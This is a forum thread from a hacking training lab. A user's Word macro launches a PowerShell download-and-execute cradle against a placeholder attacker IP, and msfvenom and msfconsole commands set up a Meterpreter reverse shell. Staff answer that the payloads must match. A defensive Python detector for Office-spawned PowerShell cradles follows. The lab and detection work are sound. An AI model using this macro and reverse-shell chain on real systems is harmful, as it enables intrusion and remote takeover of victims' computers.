Forum Discussion

justajolt
2 months ago

Weaponization: Payloads – Office Macros

I've been banging my head against this brick wall for a few hours now and I could use a second set of eyes. 

1. I've created a macro-enabled Word doc with the following VB code on a Windows machine:

Sub Document_Open()

    Dim ps as String

    ps = "powershell.exe -NoExit Invoke-Expression (New-Object Net.WebClient).DownloadString('http://MY_KALI_IP/shell.ps1')"

    process = Shell(ps, vbhide)

    End Sub

2. python3 -m http.server to start server to serve shell.ps1 on request
 
3. msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<Kali IP> lport=443 -f psh > shell.ps1 to create reverse shell with same name the command in the macro script will go looking for
 
4. create listener with sudo msfconsole, use exploit/multi/handler, set payload windows/meterpreter/reverse_tcp, set LHOST KALI IP, set LPORT 443 then exploit to start listener
 
5. Back on the Windows machine, go to target_ip:8888, browse to macro doc, submit and execute.
 
What am I missing?
  • Hi justajolt, thanks for reaching out! We've checked the lab, and it's working correctly - looking at your progress, the payloads used for msfvenom and msfconsole need to match. At the minute, you are using windows/x64/meterpreter/reverse_tcp for msfvenom and windows/meterpreter/reverse_tcp for msfconsole, when you should be using windows/x64/meterpreter/reverse_tcp for both. This should resolve the issue 👍
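
Seen from the defender's side, the chain in this thread (a Word Document_Open macro launching powershell.exe with a DownloadString cradle) shows up in process-creation telemetry. The following is an added example, not part of the original thread: a small Python check over events already parsed into dicts that use the Sysmon Event ID 1 field names (Image, CommandLine, ParentImage). The sample events and the address 192.0.2.10 are constructed.

```python
import re

# Office applications whose child processes deserve scrutiny.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "mshta.exe"}

# Markers of a download-and-execute command line like the one in the macro.
CRADLE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I)
EXECUTE = re.compile(r"invoke-expression|\biex\b", re.I)
URL = re.compile(r"https?://[^\s'\")]+", re.I)

def basename(path):
    """Lower-cased file name from a Windows or POSIX style path."""
    return re.split(r"[\\/]", path)[-1].lower()

def classify(event):
    """Return None, or a finding dict, for one process-creation event."""
    if basename(event["ParentImage"]) not in OFFICE_PARENTS:
        return None
    if basename(event["Image"]) not in SCRIPT_HOSTS:
        return None
    cmd = event["CommandLine"]
    reasons = ["office-spawned-script-host"]
    if CRADLE.search(cmd):
        reasons.append("network-download")
    if EXECUTE.search(cmd):
        reasons.append("in-memory-execution")
    severity = "high" if len(reasons) == 3 else "medium"
    return {"severity": severity, "reasons": reasons, "urls": URL.findall(cmd)}

def scan(events):
    """Return (event, finding) pairs for every event that is flagged."""
    return [(e, f) for e in events if (f := classify(e))]

# Constructed sample events (field names follow Sysmon Event ID 1).
EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoExit Invoke-Expression (New-Object "
                    "Net.WebClient).DownloadString('http://192.0.2.10/shell.ps1')"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-ChildItem"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for event, finding in scan(EVENTS):
        print(finding["severity"], finding["reasons"], finding["urls"])
```

The parent/child test alone gives a medium finding; the download and in-memory execution markers together raise it to high, and the extracted URL is what a responder would pivot on in proxy logs.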